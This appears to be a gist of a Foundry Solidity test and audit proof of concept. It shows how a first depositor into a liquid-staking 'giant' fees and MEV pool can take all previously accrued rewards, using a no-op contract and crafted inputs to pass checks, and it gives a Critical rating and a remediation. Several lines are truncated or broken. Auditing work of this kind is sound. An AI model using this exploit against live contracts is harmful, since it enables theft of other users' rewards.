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Created November 14, 2022 17:49
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pragma solidity ^0.8.13;
// SPDX-License-Identifier: MIT
import "forge-std/console.sol";
import { TestUtils } from "../utils/TestUtils.sol";
import { GiantSavETHVaultPool } from "../../contracts/liquid-staking/GiantSavETHVaultPool.sol";
import { GiantMevAndFeesPool } from "../../contracts/liquid-staking/GiantMevAndFeesPool.sol";
import { LPToken } from "../../contracts/liquid-staking/LPToken.sol";
import { MockSlotRegistry } from "../../contracts/testing/stakehouse/MockSlotRegistry.sol";
import { MockSavETHVault } from "../../contracts/testing/liquid-staking/MockSavETHVault.sol";
import { MockGiantSavETHVaultPool } from "../../contracts/testing/liquid-staking/MockGiantSavETHVaultPool.sol";
import { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import { MockLiquidStakingManager } from "../../contracts/testing/liquid-staking/MockLiquidStakingManager.sol";
// NoopContract is a contract that does nothing but that is necessary to pass some require statements.
contract NoopContract {
function claimRewards(
address _recipient,
bytes[] calldata _blsPubKeys
) external {
// does nothing, just to pass the for loop
contract GiantPoolWithdrawTests is TestUtils {
MockGiantSavETHVaultPool public giantSavETHPool;
GiantMevAndFeesPool public giantFeesAndMevPool;
MockLiquidStakingManager public liquidStakingManager;
NoopContract public noopContract;
function setUp() public {
noopContract = new NoopContract();
vm.startPrank(accountFive); // this will mean it gets dETH initial supply
factory = createMockLSDNFactory();
// Deploy 1 network
manager = deployNewLiquidStakingNetwork(
liquidStakingManager = manager;
savETHVault = MockSavETHVault(address(manager.savETHVault()));
giantSavETHPool = new MockGiantSavETHVaultPool(factory, savETHVault.dETHToken());
giantFeesAndMevPool = new GiantMevAndFeesPool(factory);
/* In this test case, the first comer depositing into the giant pool can collect all the rewards already collected
* whatever the amount even if it has not contributed to generate them. Is it expected?
* Severity: Critical
* Remediation:
* The calculation of the state, i.e., claimed AND accumulatedETHPerLPShare must happen after the token transfer instead of before.
function testFirstComerSwipeRewards() public {
// Set up users and ETH
address rewarder = accountThree;, 10 ether);
address hacker = accountTwo;, 1 ether);
uint256 rewards = 5 ether;
// rewards the pool
vm.prank(rewarder); payable(giantFeesAndMevPool).transfer(rewards);
giantFeesAndMevPool.depositETH{value: 0.001 ether}(0.001 ether);
// Hacker can claim the 5 ether even if he did not contribute to receive it...
assertRewardsClaimed(hacker, rewards);
// claimRewards claims the rewards with crafted inputs to passe some require statements.
function claimRewards(address _recipient) private {
address[] memory _stakingFundsVaults = new address[](1);
bytes[][] memory _blsPublicKeysForKnots = new bytes[][](1);
_stakingFundsVaults[0] = address(noopContract);
giantFeesAndMevPool.claimRewards(_recipient, _stakingFundsVaults, _blsPublicKeysForKnots);
// assertRewardsClaimed claim rewards and check if it changed the balance of the account.
function assertRewardsClaimed(address _recipient, uint256 expectedReward) public {
uint256 beforeBalance = address(_recipient).balance;
uint256 afterBalance = address(_recipient).balance;
// as you can see, nothing as been withdrawn...
assertEq(afterBalance - beforeBalance, expectedReward);
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